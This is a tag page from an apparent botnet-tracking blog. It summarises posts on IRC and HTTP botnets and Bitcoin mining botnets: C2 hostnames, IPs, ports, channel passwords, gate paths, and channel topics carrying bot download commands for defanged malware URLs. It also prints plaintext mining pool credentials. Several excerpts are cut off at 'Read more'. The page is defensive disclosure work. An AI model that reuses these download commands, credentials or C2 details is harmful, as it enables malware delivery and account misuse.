Tag: Bitcoin Miner Botnet

x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)

Uncategorized

Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server:  x01bkr2.biz Port:  4723 Channel:  #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperatelyRead more...

h.opennews.su (irc botnet hosted by qhoster.com)

Uncategorized

Resolved h.opennews.su to 5.45.181.254 Server:  h.opennews.su Port:  9000 Channel: #sp Channel password:  yop Topic for #sp is: !wB/smZJsKbDADvo5ab8sIF/r5RP7kkXfEsreBMH+9hiVs3ilngzFHh0Ph9sbgtC/EeqYw5x0Vj2IqRyb/knFS+LUzo6bf3cW/A1SyUXkVxz8ERDPS2K/qHObIS3TFyR2JAiWdnWc82S3KnAwUHQFMEb6h/kQqB9TcZElsKS4BnyDiGp1B19crjVgBes7+ilkHVmFLRRgoSPyUBx71ioiUporVdeOIEUhA547CIbp0odHxRQ41LK9wPz13N8KYZx6/QE//rZhBqCorPJqg3w= Topic for #sp set by SNK at Thu Apr 04 06:16:09 2013 Example bot nick:  n{USA-XPx86u}gjekbowg Alternate domains: f.eastmoon.pl gigasbh.org gigasphere.su o.dailyradio.su photobeat.su s.richlab.pl uranus.kei.su xixbh.com xixbh.net You may recognize some of the domains from previous postsRead more...

keep.hustling4life.biz (Bitcoin mining pool for botnet)

Uncategorized

Resolved keep.hustling4life.biz to 195.190.13.138, 46.17.92.158, 213.165.85.165 Someone is trying to get some mining done before the mining reward drops I guess. The file is from an already posted botnet. * Topic for #mr is: !dl hxxp://213.165.85.165:8081/udhsdfka.png * Topic for #mr set by test at Mon Nov 26 04:52:40 2012 Server:  keep.hustling4life.biz Port:  2142 Mining information:Read more...

cheatmodernwarfare.com (Multiple http bots hosted by Romania Torben Diehr)

Uncategorized

Posting some french heckers stuff Andromeda loader Server: cheatmodernwarfare.com Gate file: /xbox/image.php Rootkit plugin:  hxxp://magnatesmobileapps.com/sym/r.pack Socks plugin:  hxxp://magnatesmobileapps.com/sym/s.pack Backup domains: down4life.hopto.org explosiontaracesavatoutdechirer.chickenkiller.com fckd330.mooo.com kbot Server: h4r3.hopto.org redirects to: kb.itprosolutions.org Gate file: /joomla/gate.php Server: purenet.hopto.org Redirects to: 91.234.105.14 Gate file:  /kb/gate.php Server: smk.cheatgame.org Gate file:  /kb/gate.php Smoke loader (Currently down) Server: smk.cheatmodernwarfare.com Gate file: /s2/control.php HostbooterRead more...

planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)

Uncategorized

This is the http loader for the gold installs ppi program. Resolved planetstat2324.su to 178.255.43.67 Server: planetstat2324.su Gate file: /gamenew/index.php Downloads files from ap2producoes.com/images/ minsabdedf.exe bitcoin miner pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332 ginamdasm.exe The file botnet owners are given installs smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe Install statistics are then recorded by oroihfdbbnennm.in/activation.php Using the format  activation.php?productid=(userid)&serial=(long string)  Hosting infos:Read more...

vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)

Uncategorized

Resolved vandersand.no-ip.biz to 199.115.230.138 Server: vandersand.no-ip.biz Port:  6654 Channel: #Insomnia Channel password: frosty * Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5 * Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012 Botnick: {IT|XP-32a}uwryxvf While I was in the channel he downloaded a bitcoin miner Dextermania.exe  hxxp://versx.net/x/bcm/bitcoin-miner.exe http://pool.bitclockers.com:8332 -u Dexter -p 19930924 HostingRead more...